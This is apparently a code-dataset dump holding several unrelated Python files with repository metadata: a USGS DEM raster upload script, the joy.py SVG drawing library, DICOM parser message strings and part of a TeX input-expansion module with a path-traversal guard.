python run.py
# To run individually
python add_gm_snow_off.py
Spatial Reference Original:
* EPSG:26912 (No reprojection needed)
* Vertical Datum is NAVD 88 (No reprojection needed)
* URL https://www.sciencebase.gov/catalog/file/get/5a54a313e4b01e7be23c09a6?f=__disk__32%2F31%2Fd0%2F3231d0ab78c88fd13cc46066cd03a0a2055276aa&transform=1&allowOpen=true
Citation:
U.S. Geological Survey, 20171101, USGS NED Original Product Resolution CO MesaCo-QL2 2015 12SYJ515455 IMG 2017: U.S. Geological Survey.
"""
import glob
from os.path import abspath, expanduser, join
from snowexsql.batch import UploadRasterBatch
def main():
    """Upload the USGS 1m snow-off DEM tiles for Grand Mesa.

    Returns:
        int: number of errors encountered while pushing the rasters.
    """
    # Where download_snow_off.sh placed the GeoTIFF tiles.
    download_dir = abspath(expanduser('~/Downloads/GM_DEM'))

    # Metadata copied onto every raster tile in this upload.
    meta = {
        'site_name': 'Grand Mesa',
        'description': 'US Geological Survey 1m snow off DEM from the 3DEP',
        'units': 'meters',  # Add from the Annotation file
        'epsg': 26912,
        'surveyors': 'USGS',
        'instrument': 'lidar',
        'tiled': True,
        'type': 'DEM',
        'doi': 'https://doi.org/10.3133/fs20203062',
    }

    # Grab all the geotiffs and push them as a batch.
    tif_files = glob.glob(join(download_dir, '*.tif'))
    batch = UploadRasterBatch(tif_files, **meta)
    batch.push()
    return len(batch.errors)


if __name__ == '__main__':
    main()
| 25.219178 | 169 | 0.660511 |
acfb4547e92379f6e9ad545cb4b8aa2ff0dcaea5 | 26,448 | py | Python | joy.py | anandology/joy | c0618691c0fd682875ab4f621659a9531149f81d | [
"MIT"
] | null | null | null | joy.py | anandology/joy | c0618691c0fd682875ab4f621659a9531149f81d | [
"MIT"
] | null | null | null | joy.py | anandology/joy | c0618691c0fd682875ab4f621659a9531149f81d | [
"MIT"
] | null | null | null | """
Joy
===
Joy is a tiny creative coding library in Python.
BASIC USAGE
An example of using joy:
>>> from joy import *
>>>
>>> c = circle(x=100, y=100, r=50)
>>> show(c)
The `circle` function creates a new circle and the `show` function
displays it.
PRINCIPLES
Joy follows functional programming approach for its interface. Each
function/class gives a shape and those shapes can be transformed and
combined using other utility functions.
By design, there is no global state in the library.
Joy uses SVG to render the shapes and the shapes are really a very thin
wrapper over SVG nodes. It is possible to use every functionality of SVG,
even if that is not exposed in the API.
COORDINATE SYSTEM
Joy uses a canvas with (0, 0) as the center of the canvas.
By default the size of the canvas is (300, 300).
BASIC SHAPES
Joy supports `circle`, `rectangle` and `line` as basic shapes.
>>> c = circle(x=100, y=100, r=50)
>>> r = rectangle(x=0, y=0, w=200, h=200)
>>> show(c, r)
All basic shapes have default values of all the arguments, making it
easier to start using them.
>>> c = circle()
>>> r = rectangle()
>>> z = line()
>>> show(c, r, z)
COMBINING SHAPES
The `+` operator is used to combine multiple shapes into a
single shape.
>>> shape = circle() + rectangle()
>>> show(shape)
TRANSFORMATIONS
Joy supports `translate`, `rotate` and `scale` transformations.
The `translate` transformation moves the given shape by `x` and `y`.
>>> c1 = circle(r=50)
>>> c2 = c1 | translate(x=100, y=0)
>>> show(c1, c2)
As you've seen the above example, transformations are applied using
the `|` operator.
The `Rotate` transformation rotates a shape anti-clockwise by the specified
angle.
>>> shape = rectangle() | rotate(angle=45)
>>> show(shape)
The `Scale` transformation scales a shape.
>>> shape = circle() | scale(x=1, y=0.5)
>>> show(shape)
HIGER ORDER TRANSFORMATIONS
Joy supports a transform called `repeat` to apply a transformation multiple times
and combining all the resulting shapes.
>>> flower = rectangle() | repeat(18, rotate(10))
>>> show(flower)
JUPYTER LAB INTEGRATION
Joy integrates very well with Jupyter notebooks and every shape is
represented as SVG image by jupyter.
"""
import html
import itertools
import random as random_module
import string
__version__ = "0.2.3"
__author__ = "Anand Chitipothu <anand@fossunited.org>"

SQRT2 = 2 ** 0.5

# A short random suffix keeps generated shape ids unique when multiple
# sketches are embedded in the same page.
_ID_ALPHABET = string.ascii_letters + string.digits
ID_SUFFIX = "".join(random_module.choice(_ID_ALPHABET) for _ in range(4))


def shape_sequence():
    """Returns a generator yielding unique ids "s-<n>-<suffix>"."""
    return (f"s-{n}-{ID_SUFFIX}" for n in itertools.count())


shape_seq = shape_sequence()
class Shape:
    """Shape is the base class for all shapes in Joy.

    A Shape is an SVG node and supports converting itself into svg text.
    Typically, users do not interact with this class directly, but use it
    through its subclasses.
    """
    def __init__(self, tag, children=None, transform=None, **attrs):
        """Creates a new shape.

        Parameters:
            tag: the svg tag name, e.g. "circle".
            children: optional list of child shapes.
            transform: optional transformation applied to this shape.
            attrs: svg attributes of the node.
        """
        self.tag = tag
        self.children = children
        self.attrs = attrs
        # Bug fix: the transform argument used to be ignored and always
        # reset to None here.
        self.transform = transform

    def get_reference(self):
        """Returns a <use> node referencing this shape, assigning this
        shape an id on first use."""
        if "id" not in self.attrs:
            self.attrs["id"] = next(shape_seq)
        attrs = {"xlink:href": "#" + self.id}
        return Shape("use", **attrs)

    def __repr__(self):
        return f"<{self.tag} {self.attrs}>"

    def __getattr__(self, name):
        # Expose svg attributes as python attributes (e.g. circle.cx).
        if not name.startswith("_") and name in self.attrs:
            return self.attrs[name]
        else:
            raise AttributeError(name)

    def apply_transform(self, transform):
        """Returns a clone of this shape with the transformation applied,
        chaining it after any existing transformation."""
        if self.transform is not None:
            transform = self.transform | transform
        shape = self.clone()
        shape.transform = transform
        return shape

    def clone(self):
        """Returns a shallow copy with its own attrs dict and no id."""
        shape = object.__new__(self.__class__)
        shape.__dict__.update(self.__dict__)
        # don't share attrs on clone
        # also remove the id as the new node gets a new id
        shape.attrs = dict(self.attrs)
        shape.attrs.pop("id", None)
        return shape

    def get_attrs(self):
        """Returns the svg attributes, including the serialized
        transform when present."""
        attrs = dict(self.attrs)
        if self.transform:
            attrs['transform'] = self.transform.as_str()
        return attrs

    def as_dict(self):
        """Returns this node (and, recursively, its children) as a dict."""
        d = self.get_attrs()
        d['tag'] = self.tag
        if self.children:
            d['children'] = [n.as_dict() for n in self.children]
        return d

    def _svg(self, indent="") -> str:
        """Returns the svg representation of this node.

        This method is used to recursively construct the svg of a node
        and its children. The returned text ends with a newline.

        >>> c = Shape(tag='circle', cx=100, cy=100, r=50)
        >>> c._svg()
        '<circle cx="100" cy="100" r="50" />\\n'
        """
        attrs = self.get_attrs()
        if self.children:
            tag_text = render_tag(self.tag, **attrs, close=False)
            return (
                indent + tag_text + "\n" +
                "".join(c._svg(indent + " ") for c in self.children) +
                indent + "</" + self.tag + ">\n"
            )
        else:
            tag_text = render_tag(self.tag, **attrs, close=True)
            return indent + tag_text + "\n"

    def as_svg(self, width=300, height=300) -> str:
        """Renders this node as an svg image.

        The svg image is assumed to be of size (300, 300) unless the
        width and the height arguments are provided.

        Example:

            >>> c = Shape(tag='circle', cx=100, cy=100, r=50)
            >>> print(c.as_svg())
            <svg width="300" height="300" viewBox="-150 -150 300 300" fill="none" stroke="black" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
            ...
            </svg>
        """
        return SVG([self], width=width, height=height).render()

    def __add__(self, shape):
        if not isinstance(shape, Shape):
            return NotImplemented
        return Group([self, shape])

    def _repr_svg_(self):
        """Hook called by Jupyter to render this object as an svg image."""
        return self.as_svg()
class SVG:
    """SVG renders a list of svg nodes into a complete svg image.

    Parameters:
        nodes: the shapes to render.
        width: image width in pixels (default 300).
        height: image height in pixels (default 300).
    """
    def __init__(self, nodes, width=300, height=300):
        self.nodes = nodes
        self.width = width
        self.height = height

    def render(self):
        """Returns the complete svg document as a string."""
        attrs = {
            "tag": "svg",
            "width": self.width,
            "height": self.height,
            # Center the viewBox on the origin.
            "viewBox": f"-{self.width//2} -{self.height//2} {self.width} {self.height}",
            "fill": "none",
            "stroke": "black",
            "xmlns": "http://www.w3.org/2000/svg",
            "xmlns:xlink": "http://www.w3.org/1999/xlink"
        }
        svg_header = render_tag(**attrs) + "\n"
        svg_footer = "</svg>\n"

        # flip the y axis so that y grows upwards
        node = Group(self.nodes) | Scale(sx=1, sy=-1)

        return svg_header + node._svg() + svg_footer

    def _repr_svg_(self):
        return self.render()

    def __str__(self):
        return self.render()

    def __repr__(self):
        # Bug fix: this was a plain string literal ("SVG:{self.nodes}")
        # missing the f-prefix, so the placeholder was never expanded.
        return f"SVG:{self.nodes}"
class Point:
    """Creates a new Point.

    Point represents a point in the coordinate space and it contains
    attributes x and y.

        >>> p = Point(x=100, y=50)
    """
    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __eq__(self, p):
        return isinstance(p, Point) \
            and p.x == self.x \
            and p.y == self.y

    def __hash__(self):
        # Defining __eq__ disables the default hash; restore hashability
        # (consistent with __eq__) so points can be dict keys / set members.
        return hash((self.x, self.y))

    def __repr__(self):
        return f"Point({self.x}, {self.y})"
class Circle(Shape):
    """A circle shape.

    Parameters:
        center: center point of the circle; defaults to Point(0, 0).
        radius: radius of the circle; defaults to 100.

    Examples:

        >>> show(Circle())
        >>> show(Circle(radius=50))
        >>> show(Circle(center=Point(x=100, y=100), radius=50))
    """
    def __init__(self, center=Point(0, 0), radius=100, **kwargs):
        self.center = center
        self.radius = radius
        super().__init__(
            "circle",
            cx=center.x,
            cy=center.y,
            r=radius,
            **kwargs)
class Ellipse(Shape):
    """An ellipse shape.

    Parameters:
        center: center point of the ellipse; defaults to Point(0, 0).
        width: width of the ellipse; defaults to 200.
        height: height of the ellipse; defaults to 100.

    Examples:

        >>> show(Ellipse())
        >>> show(Ellipse(width=100, height=50))
        >>> show(Ellipse(center=Point(x=100, y=100), width=200, height=100))
    """
    def __init__(self, center=Point(0, 0), width=200, height=100, **kwargs):
        self.center = center
        self.width = width
        self.height = height
        super().__init__(
            tag="ellipse",
            cx=center.x,
            cy=center.y,
            rx=width / 2,
            ry=height / 2,
            **kwargs)
class Rectangle(Shape):
    """A rectangle shape.

    Parameters:
        center: center point of the rectangle; defaults to Point(0, 0).
        width: width of the rectangle; defaults to 200.
        height: height of the rectangle; defaults to 100.

    Examples:

        >>> show(Rectangle())
        >>> show(Rectangle(width=200, height=200))  # a square
        >>> show(Rectangle(center=Point(x=100, y=100), width=200, height=100))
    """
    def __init__(self, center=Point(0, 0), width=200, height=100, **kwargs):
        self.center = center
        self.width = width
        self.height = height
        # svg rects are positioned by their top-left corner.
        super().__init__(
            tag="rect",
            x=center.x - width / 2,
            y=center.y - height / 2,
            width=width,
            height=height,
            **kwargs)
class Line(Shape):
    """A line segment connecting two points.

    Parameters:
        start: starting point; defaults to Point(-100, 0).
        end: ending point; defaults to Point(100, 0).

    Examples:

        >>> show(Line())
        >>> show(Line(start=Point(x=0, y=0), end=Point(x=100, y=50)))
    """
    def __init__(self, start=Point(-100, 0), end=Point(100, 0), **kwargs):
        self.start = start
        self.end = end
        super().__init__(
            "line",
            x1=start.x,
            y1=start.y,
            x2=end.x,
            y2=end.y,
            **kwargs)
class Group(Shape):
    """Container that groups a list of shapes into one svg <g> element.

    Users normally combine shapes with the + operator, which creates a
    Group implicitly:

        >>> show(Circle() + Rectangle())

    Parameters:
        shapes: the list of shapes to group.
    """
    def __init__(self, shapes, **kwargs):
        super().__init__("g", children=shapes, **kwargs)
def render_tag(tag, *, close=False, **attrs):
    """Renders a html/svg tag.

        >>> render_tag("circle", cx=0, cy=0, r=10)
        '<circle cx="0" cy="0" r="10">'

    When `close=True`, the tag is closed with "/>".

        >>> render_tag("circle", cx=0, cy=0, r=10, close=True)
        '<circle cx="0" cy="0" r="10" />'

    Underscore characters in the attribute name are replaced with hypens.

        >>> render_tag("circle", cx=0, cy=0, r=10, stroke_width=2)
        '<circle cx="0" cy="0" r="10" stroke-width="2">'

    Attributes with value None are skipped entirely.
    """
    end = " />" if close else ">"
    # Filter None-valued attributes first; checking `attrs` before
    # filtering used to emit "<tag >" with a stray space when every
    # attribute was None.
    items = [(k.replace("_", "-"), html.escape(str(v)))
             for k, v in attrs.items() if v is not None]
    if items:
        attrs_text = " ".join(f'{k}="{v}"' for k, v in items)
        return f"<{tag} {attrs_text}{end}"
    else:
        return f"<{tag}{end}"
class Transformation:
    """Base class for all transformations.

    Supports `shape | transformation` to apply a transformation to a
    shape and `t1 | t2` to chain two transformations.
    """
    def apply(self, shape):
        """Applies this transformation to the given shape."""
        return shape.apply_transform(self)

    def join(self, transformation):
        """Chains this transformation with another one."""
        return TransformationList([self, transformation])

    def __or__(self, right):
        if isinstance(right, Transformation):
            return self.join(transformation=right)
        return NotImplemented

    def __ror__(self, left):
        if isinstance(left, Shape):
            return self.apply(shape=left)
        return NotImplemented
class TransformationList(Transformation):
    """A chain of transformations, applied left to right."""
    def __init__(self, transformations):
        self.transformations = transformations

    def join(self, transformation):
        """Returns a new chain with one more transformation appended."""
        return TransformationList(self.transformations + [transformation])

    def as_str(self):
        # SVG applies transforms right-to-left, so emit them in reverse
        # to preserve the left-to-right application order of the chain.
        return " ".join(t.as_str() for t in reversed(self.transformations))
class Translate(Transformation):
    """Transformation that moves a shape by x and y units.

    Parameters:
        x: units to move along the x axis.
        y: units to move along the y axis.

    Example:

        >>> show(Circle() | Translate(100, 50))
    """
    def __init__(self, x, y):
        self.x = x
        self.y = y

    def as_str(self):
        return f"translate({self.x} {self.y})"
class Rotate(Transformation):
    """Transformation that rotates a shape by `angle` degrees around the
    `anchor` point.

    Parameters:
        angle: angle of rotation in degrees.
        anchor: point to rotate around; defaults to the origin.

    Examples:

        Rotate a square by 45 degrees:

        >>> show(Rectangle() | Rotate(angle=45))

        Rotate around a custom anchor point:

        >>> show(Rectangle() | Rotate(angle=45, anchor=Point(100, 0)))
    """
    def __init__(self, angle, anchor=Point(0, 0)):
        self.angle = angle
        self.anchor = anchor

    def as_str(self):
        a = self.anchor
        # The anchor can be omitted from the svg when it is the origin.
        if a == Point(0, 0):
            return f"rotate({self.angle})"
        return f"rotate({self.angle} {a.x} {a.y})"
class Scale(Transformation):
    """Transformation that scales a shape.

    Parameters:
        sx: scale factor in the x direction.
        sy: scale factor in the y direction; defaults to sx.
    """
    def __init__(self, sx, sy=None):
        self.sx = sx
        self.sy = sx if sy is None else sy

    def as_str(self):
        return f"scale({self.sx} {self.sy})"
class Repeat(Transformation):
    """Repeat is a higher-order transformation that repeats a
    transformation multiple times.

    Parameters:
        n:
            The number of times to repeat the transformation.

        transformation:
            The transformation to apply repeatedly.

    Examples:

        Draw three circles:

            >>> shape = Circle(radius=25) | Repeat(4, Translate(x=50, y=0))
            >>> show(shape)

        Rotate a line multiple times:

            >>> shape = Line() | Repeat(36, Rotate(angle=10))
            >>> show(shape)

        Rotate and shrink a line multiple times:

            >>> shape = Line() | Repeat(18, Rotate(angle=10) | Scale(sx=0.9))
            >>> show(shape)
    """
    def __init__(self, n, transformation):
        self.n = n
        self.transformation = transformation

    def apply(self, shape):
        # Emit the shape once inside <defs> and repeat a lightweight
        # <use> reference, so the svg does not duplicate the full node
        # n times.
        ref = shape.get_reference()
        defs = Shape("defs", children=[shape])
        return defs + self._apply(ref, self.transformation, self.n)

    def _apply(self, shape, tf, n):
        # Recursively builds shape + tf(shape + tf(...)), so the i-th
        # copy ends up with the transformation applied i times.
        if n == 1:
            return shape
        else:
            result = self._apply(shape, tf, n-1) | tf
            return shape + result
class Cycle(Transformation):
    """Rotates the given shape repeatedly and combines all the resulting
    shapes, producing surprising radial patterns.

    Parameters:
        n: number of copies; also determines the default per-step angle
            of 360/n degrees.
        anchor: anchor point of the rotation; defaults to the origin.
        s: optional scale factor applied cumulatively per step, which
            grows or shrinks the shape while rotating.
        angle: optional per-step angle; defaults to 360/n.

    Examples:

        >>> show(Line() | Cycle())
        >>> show(Rectangle() | Cycle())
        >>> show(Rectangle(width=300, height=300) | Cycle(n=72, s=0.92))
    """
    def __init__(self, n=18, anchor=Point(x=0, y=0), s=None, angle=None):
        self.n = n
        self.angle = 360 / n if angle is None else angle
        self.anchor = anchor
        self.s = s

    def apply(self, shape):
        copies = [
            shape | Rotate(angle=i * self.angle, anchor=self.anchor)
            for i in range(self.n)
        ]
        if self.s is not None:
            # Apply a cumulative scale so the i-th copy is scaled s**i.
            copies = [
                copy | Scale(sx=self.s ** i)
                for i, copy in enumerate(copies)
            ]
        return Group(copies)
def show(*shapes):
    """Shows the given shapes in the Jupyter notebook.

    A light-colored border and axes through the origin are drawn behind
    the shapes as a visual reference.

    Parameters:
        shapes: the shapes to show.

    Examples:

        >>> show(circle())
        >>> show(circle(), rectangle())
    """
    # Reference canvas: border plus x and y axes in a light gray.
    frame = Rectangle(width=300, height=300, stroke="#ddd")
    x_axis = Line(start=Point(x=-150, y=0), end=Point(x=150, y=0), stroke="#ddd")
    y_axis = Line(start=Point(x=0, y=-150), end=Point(x=0, y=150), stroke="#ddd")

    img = SVG([frame, x_axis, y_axis] + list(shapes))

    from IPython.display import display
    display(img)
def circle(x=0, y=0, r=100, **kwargs):
    """Creates a circle with center at (x, y) and radius of r.

    Examples:

        >>> show(circle())
        >>> show(circle(r=50))
        >>> show(circle(x=10, y=20, r=50))
    """
    center = Point(x=x, y=y)
    return Circle(center=center, radius=r, **kwargs)
def rectangle(x=0, y=0, w=200, h=100, **kwargs):
    """Creates a rectangle centered at (x, y) with width w and height h.

    Extra keyword arguments (stroke, fill, ...) are forwarded to Rectangle.

    Examples:
        r = rectangle()                          # default 200x100 rectangle
        r = rectangle(w=100, h=50)               # 100x50 rectangle
        r = rectangle(x=10, y=20, w=100, h=50)   # centered at (10, 20)
    """
    center = Point(x=x, y=y)
    return Rectangle(center=center, width=w, height=h, **kwargs)
def ellipse(x=0, y=0, w=200, h=100, **kwargs):
    """Creates an ellipse centered at (x, y) with width w and height h.

    Extra keyword arguments (stroke, fill, ...) are forwarded to Ellipse.

    Examples:
        e = ellipse()                          # default 200x100 ellipse
        e = ellipse(w=100, h=50)               # 100x50 ellipse
        e = ellipse(x=10, y=20, w=100, h=50)   # centered at (10, 20)
    """
    center = Point(x=x, y=y)
    return Ellipse(center=center, width=w, height=h, **kwargs)
def line(x1=None, y1=None, x2=None, y2=None, **kwargs):
    """Creates a line from point (x1, y1) to point (x2, y2).

    When no coordinates are given, a default horizontal line from
    (-100, 0) to (100, 0) is created.  When any coordinate is given,
    all four must be given.

    Raises:
        ValueError: if only some of the four coordinates are specified.

    Examples:
        Draw a line.
        z = line()
        Draw a line from (10, 20) to (100, 200)
        z = line(x1=10, y1=20, x2=100, y2=200)
    """
    if x1 is None and y1 is None and x2 is None and y2 is None:
        x1, y1 = -100, 0
        x2, y2 = 100, 0
    else:
        pairs = dict(x1=x1, y1=y1, x2=x2, y2=y2)
        missing = [name for name, value in pairs.items() if value is None]
        if missing:
            # Bug fix: the original passed two arguments to Exception(),
            # which makes args a tuple and renders the message as
            # "('missing arguments for line: ', 'y1, x2')".  Build a
            # single string, and raise the more specific ValueError
            # (a subclass of Exception, so existing handlers still match).
            raise ValueError("missing arguments for line: " + ", ".join(missing))
    return Line(start=Point(x1, y1), end=Point(x2, y2), **kwargs)
def point(x, y):
    """Creates a Point with x and y coordinates.

    Thin convenience wrapper so scripts can use a lowercase function name
    consistent with circle(), rectangle(), line(), etc.
    """
    return Point(x, y)
def polygon(points, **kwargs):
    """Creates a polygon from the given list of points.

    Example:
        a = point(x=0, y=0)
        b = point(x=100, y=0)
        c = point(x=0, y=100)
        show(polygon([a, b, c]))   # a triangle
    """
    coords = ["{},{}".format(p.x, p.y) for p in points]
    return Shape(tag="polygon", points=" ".join(coords), **kwargs)
def polyline(points, **kwargs):
    """Creates a polyline from the given list of points.

    Example:
        a = point(x=-50, y=50)
        b = point(x=0, y=-25)
        c = point(x=0, y=25)
        d = point(x=50, y=-50)
        show(polyline([a, b, c, d]))
    """
    coords = ["{},{}".format(p.x, p.y) for p in points]
    return Shape(tag="polyline", points=" ".join(coords), **kwargs)
def translate(x=0, y=0):
    """Translates a shape.

    Returns a Translate transformation that moves a shape x units in the
    x direction and y units in the y direction when piped with ``|``.

    Examples:
        Translate a shape by 10 units in x direction.
        shape = circle() | translate(x=10)
        Translate a shape by 10 units in y direction.
        shape = circle() | translate(y=10)
        Translate a shape by 10 units in x direction and 20 units in y direction.
        shape = circle() | translate(x=10, y=20)
    """
    return Translate(x=x, y=y)
def scale(s=None, x=1, y=1):
    """Scales a shape.

    When s is given it scales uniformly in both directions; otherwise the
    independent x and y factors are used.

    Examples:
        shape = circle() | scale(0.5)           # uniform
        shape = circle() | scale(x=0.5)         # x only
        shape = circle() | scale(y=0.5)         # y only
        shape = circle() | scale(x=0.5, y=0.75) # different factors
    """
    if s is None:
        return Scale(sx=x, sy=y)
    return Scale(sx=s, sy=s)
def rotate(angle):
    """Rotates a shape.

    Returns a Rotate transformation for the given angle in degrees,
    applied with the ``|`` operator.

    Examples:
        Rotate a shape by 30 degrees
        shape = line() | rotate(30)
    """
    return Rotate(angle)
def repeat(n, transformation):
    """Repeats a transformation multiple times on a shape.

    Returns a Repeat transformation that applies ``transformation`` n
    times cumulatively when piped with ``|``.

    Examples:
        Repeatly rotate a line 9 times by 10 degrees.
        shape = line() | repeat(9, rotate(10))
    """
    return Repeat(n, transformation)
def combine(shapes):
    """The combine function combines a list of shapes into a single shape.

    The shapes are wrapped in a Group, so the result can be transformed
    or shown as one unit.

    Example:
        >>> shapes = [circle(r=50), circle(r=100), circle(r=150)]
        >>> shape = combine(shapes)
        >>> show(shape)
    """
    return Group(shapes)
def color(r, g, b, a=None):
    """Build a CSS color string from r, g, b components (0-255 each).

    When the optional alpha value a (0-1) is supplied, an ``rgba(...)``
    string is returned; otherwise a plain ``rgb(...)`` string.
    """
    if a is None:
        return "rgb({}, {}, {})".format(r, g, b)
    return "rgba({}, {}, {}, {})".format(r, g, b, a)
def random(a=None, b=None):
    """Creates a random number.

    Three call forms are supported:

        random()        # a random number between 0 and 1
        random(n)       # a random number between 0 and n
        random(n1, n2)  # a random number between n1 and n2

    Examples:
        >>> random()
        0.4336206360591218
        >>> random(10)
        1.436301598755494
        >>> random(5, 10)
        7.471950621969087
    """
    fraction = random_module.random()
    if a is None and b is None:
        return fraction
    if b is None:
        return a * fraction
    return a + (b - a) * fraction
| 25.980354 | 132 | 0.573805 |
acfb457f7974a440bf82a60533ea55e6ee7c4f11 | 576 | py | Python | src/dicom_parser/data_elements/messages.py | GalBenZvi/dicom_parser | fc3e892ebf99c4e5d62cb5e7de7df341baf445fe | [
"MIT"
] | 11 | 2020-08-08T21:41:54.000Z | 2021-07-27T12:48:31.000Z | src/dicom_parser/data_elements/messages.py | GalBenZvi/dicom_parser | fc3e892ebf99c4e5d62cb5e7de7df341baf445fe | [
"MIT"
] | 45 | 2020-03-03T14:32:16.000Z | 2021-07-30T16:42:17.000Z | src/dicom_parser/data_elements/messages.py | GalBenZvi/dicom_parser | fc3e892ebf99c4e5d62cb5e7de7df341baf445fe | [
"MIT"
] | 6 | 2021-10-19T09:19:22.000Z | 2022-03-13T19:26:10.000Z | """
Strings and string formatting templates used in this module.
"""
#: Message displayed when a failure occurs to parse a "DA" data element's raw
#: value.
DATE_PARSING_FAILURE = "Failed to parse '{value}' into a valid date object"
#: Message displayed when trying to parse an "SQ" data element directly.
INVALID_SEQUENCE_PARSING = (
"SequenceOfItems data element values should be assigned externally."
)
#: Message displayed when a failure occurs to parse a "TM" data element's raw
#: value.
TIME_PARSING_FAILURE = "Failed to parse '{value}' into a valid time object"
| 36 | 77 | 0.751736 |
acfb464f768ae2bfb391d2f97910a4514bed016c | 9,442 | py | Python | data-processing/common/normalize_tex.py | alexkreidler/scholarphi | 86d26d0bfa5ded00760fba1a9c6891a94a3dd6d2 | [
"Apache-2.0"
] | null | null | null | data-processing/common/normalize_tex.py | alexkreidler/scholarphi | 86d26d0bfa5ded00760fba1a9c6891a94a3dd6d2 | [
"Apache-2.0"
] | null | null | null | data-processing/common/normalize_tex.py | alexkreidler/scholarphi | 86d26d0bfa5ded00760fba1a9c6891a94a3dd6d2 | [
"Apache-2.0"
] | null | null | null | import logging
import os.path
import posixpath
import re
from dataclasses import dataclass
from enum import Enum, auto
from typing import List, Optional, Union
from common.scan_tex import Pattern, scan_tex
from common.types import CharacterRange, Path
@dataclass(frozen=True)
class Expansion(CharacterRange):
    # Replacement TeX produced by expanding an \input or \include macro;
    # the character span it replaces comes from CharacterRange.
    tex: str
@dataclass(frozen=True)
class EndInput(CharacterRange):
    # Marks the character span of an \endinput macro; carries no payload.
    pass
class FileDiscoveryStrategy(Enum):
    """How to resolve a file name referenced by a TeX import macro."""
    # Use the file name exactly as given, with no extension handling.
    EXACT = auto()
    INPUT = auto()
    " Emulate behavior of \\input macro by appending '.tex' to a file name if it has no extension. "
    INCLUDE = auto()
    " Emulate behavior of \\include macro by appending '.tex' to all file names. "
# Pre-load a template that can be used to expand the '\include' macro.
with open(os.path.join("resources", "include-expansion.tex")) as file_:
INCLUDE_EXPANSION = file_.read()
def expand_tex(
    tex_dir: Path,
    tex_name: str,
    discover_by: FileDiscoveryStrategy = FileDiscoveryStrategy.EXACT,
    within: Optional[str] = None,
    is_input: bool = False,
) -> Optional[str]:
    """
    Unify the TeX in a file by combining together TeX from the files. The TeX file to be read is
    'tex_name' and it will be looked for in 'tex_dir'.  Returns the expanded TeX as a string, or
    None when the file cannot be found, read, or lies outside the allowed directory.

    Files can be searched for in the tex_dir according to special rules using the 'discover_by'
    parameter. The parameter can tell the method to resolve the TeX filename using the rules that
    are used by the '\\input'' or '\\include'' macros.

    The 'within' parameter makes sure this function doesn't read files it shouldn't. Input files
    are only expanded if their absolute resolved file path is inside the directory specified by
    'within'. If 'within' is not specified, then it will be set to 'tex_dir'.

    'is_input' is set internally on recursive calls so that \\endinput is honored only inside
    files that were themselves imported.

    Based loosely on the code from the Perl latexpand utility in TeXLive, which is distributed under a
    BSD license: https://ctan.org/pkg/latexpand?lang=en

    Features not supported by this function are:
    * \\includeonly command (which specifies which \\include scripts to process)
    * handling quotation marks around input or included files. In some cases it will work the
      same as LaTeX does, and in some cases it won't. It seems how files are included
      that have quotes differs by LaTeX version https://tex.stackexchange.com/a/515259/198728
    * expanding files that don't use a 'utf-8'-compatible encoding. TeX files can include
      multiple input encodings, even within the same file. However, this function will not expand
      input that fail to open as UTF-8 files.
    """
    # Resolve path to TeX file, and make sure it's in a valid directory.
    within = os.path.abspath(os.path.realpath(within or tex_dir))
    qualified_tex_path = os.path.abspath(
        os.path.realpath(os.path.join(tex_dir, tex_name))
    )
    # Path-traversal guard: refuse to read anything that resolves outside 'within'.
    if os.path.commonpath([within, qualified_tex_path]) != within:
        logging.warning(  # pylint: disable=logging-not-lazy
            "TeX macro attempted to import file %s which is not in %s. This is forbidden. "
            + "This file will not be expanded.",
            qualified_tex_path,
            within,
        )
        return None
    # Add '.tex' extension to the file name if it is being imported using an '\include' macro.
    if discover_by == FileDiscoveryStrategy.INCLUDE:
        qualified_tex_path += ".tex"
    # Add the '.tex' extension to the file name as done for by the '\input' macro. As mentioned in
    # the TeXBook, "TEX automatically supplies the suffix '.tex' if no suffix has been specified."
    elif discover_by == FileDiscoveryStrategy.INPUT:
        if len(os.path.splitext(qualified_tex_path)[1]) == 0:
            qualified_tex_path += ".tex"
    if not os.path.exists(qualified_tex_path):
        logging.warning(  # pylint: disable=logging-not-lazy
            "Could not find file '%s' in directory '%s'. No text will be read from this file.",
            tex_name,
            tex_dir,
        )
        return None
    input_patterns = [
        # Put patterns with braces before those without braces so they have priority in matching.
        Pattern("input_braces", r"\\input\s*{([^}]+)}"),
        Pattern("input_quotes", r'\\input\s+"([^"]+)"'),
        Pattern("input", r"\\input\s+(\S+)"),
    ]
    # Note that while it's supported here, '\include' seem to be pretty rare in research papers.
    # In a specific sample of about 120 conference papers, only 5 had '\include' macros, yet
    # many more had '\input' commands). Only 1 used an '\include' macro to read in text.
    # The rest of the files used '\include' macros to include macros and usepackage statements.
    include_patterns = [
        Pattern("include_braces", r"\\include\s*{([^}]+)}"),
        Pattern("include", r"\\include\s+(\S+)"),
    ]
    endinput_pattern = Pattern("endinput", r"\\endinput( |\t|\b|\{.*?\})")
    patterns = input_patterns + include_patterns + [endinput_pattern]
    # Read TeX for a file.
    with open(qualified_tex_path, encoding="utf-8") as tex_file:
        try:
            tex = tex_file.read()
        except Exception as e:  # pylint: disable=broad-except
            logging.warning(  # pylint: disable=logging-not-lazy
                "Could not read file at %s due to error: %s. The TeX for this file will "
                + "not be expanded",
                qualified_tex_path,
                e,
            )
            return None
    # Edits are collected first and then applied in reverse order (below)
    # so that earlier character offsets remain valid while splicing.
    replacements: List[Union[Expansion, EndInput]] = []
    endinputs = []
    end_file_at = None
    # Scan file for input macros, expanding them.
    for match in scan_tex(tex, patterns):
        # If a file is being read as input, and the '\endinput' macro is reached, end output
        # the end of the line that \endinput appears on. See the TeXBook for a description of
        # the how \endinput is expanded.
        if is_input and match.pattern is endinput_pattern:
            endinput = EndInput(start=match.start, end=match.end)
            replacements.append(endinput)
            endinputs.append(endinput)
            # Find the newline after the \endinput, after which no more inputs should be expanded
            # and the file should be truncated.
            end_of_line = re.compile("$", flags=re.MULTILINE)
            end_of_line_match = end_of_line.search(tex, pos=match.end)
            if end_of_line_match:
                end_file_at = end_of_line_match.start()
            continue
        # Re-run the pattern against the matched text to extract the path to the file
        # that is meant to be included.
        match_with_groups = re.match(match.pattern.regex, match.text)
        if match_with_groups is None or len(match_with_groups.groups()) < 1:
            logging.warning(  # pylint: disable=logging-not-lazy
                "Unexpected error in extracting path for input / include command %s using "
                + "regular expression %s",
                match.text,
                match.pattern.regex,
            )
            continue
        input_path = match_with_groups.group(1)
        # Clean up the path
        # In TeX, paths are specified in Unix format. Convert to platform-specific path format
        # to let the program search for and read the file.
        input_path = input_path.strip().replace(posixpath.sep, os.path.sep)
